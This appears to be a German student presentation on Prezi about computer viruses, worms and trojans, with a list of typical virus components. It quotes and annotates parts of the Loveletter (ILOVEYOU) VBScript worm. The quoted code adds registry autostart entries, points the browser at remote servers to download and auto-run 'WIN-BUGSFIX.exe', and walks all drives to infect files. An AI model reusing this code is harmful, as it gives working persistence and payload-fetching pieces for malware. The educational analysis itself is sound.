Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

Von Viren und Würmern

No description
by

Flavio Heim

on 16 June 2011

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of Von Viren und Würmern

Definition Schadprogramm, dass sich an ein anderes (Wirts-) Programm hängt und durch dieses Schad- und Reproduktionsfunktionen ausführt. Die Sprache Komplexe (höhere) Programmiersprachen erzeugen viel Code. Deshalb werden oft Sprachen gebraucht, die dem einfachen Maschinencode direkt übergeordnet sind. Ein gutes Beispiel ist z.B. Assembler, da hier direkt auf Maschinencode übersetzt und das Schadprogramm klein gehalten werden kann. Unterschiede Was oft einfach "Virus" bezeichnet wird, gehört eigentlich zu der Gruppe der "Malware", von welcher die Viren nur eine Untergruppe sind. Viren:
Passiver Programmcode
Abhängigkeit vom Wirtprogramm Würmer
Aktive Verbreitung
Unabhängiges Vorgehen Trojaner Wichtige Untergruppe der Malware. Werden gebraucht um Viren, Würmer und andere Schadprogramme in ein System zu schleusen. In seltenen Fällen kann ein Trojaner auch eine für den User nützliche Funktion erfüllen. Aufbau und Funktionen 6 typische Funktionen von Viren 1. Entschlüsselungsroutine; falls der Virus verschlüsselt ist, wird er entschlüsselt. 2. Erkennungsteil; scannt Umgebung nach sich selbst um eine doppelte Infektion zu vermeiden. 3. Vermehrungsteil; infiziert alle geeigneten Programme, welche gefunden werden können. 4. Bedingungsteil; der Virus wartet auf einen geeigneten Zeitpunkt um seine Funktionen auszuführen. 5. Schadensteil; lahmlegen von Prozessen, löschen von Dateien und beeinträchtigung des Systems. 6. Tarnungsteil; Gegenstück zum Entschlüsselungsteil, verschlüsselt das Virus wieder. Von Viren und Würmern Teile des Loveletter sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\


regruns = Funktion für Veränderungen der Registry. Eintrag in Autostart, Verkoppelung mit Betriebssystem. Internet Explorer\Download Directory")
if (downread="") then
downread="c:"
end if

Download-Verzeichnis wird ermittelt. if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjk
xcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/
WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page","http://www.skyinet.net/~angelcat/skladjflfd
jghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/
WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpG
qaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB
mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmz
nxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if

if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\

CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\

Internet Explorer\Main\Start Page","about:blank"
end if
end sub Virus verändert Browserstartseite basierend auf einer Zufallszahl und verweist auf Dateidownload auf einem Server, der (falls heruntergeladen) in der Registry eingetragen und als zusätzliche Schadquelle für den Virus eingebunden wird. sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"")
end if
Next

listadriv = s
end sub


Hier werden sämtliche Laufwerke aufgelistet und alle Ordner abgearbeitet. sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub

Der Infekt-Befehl koppelt das Virus in sämtliche geeigneten Dateien.
Full transcript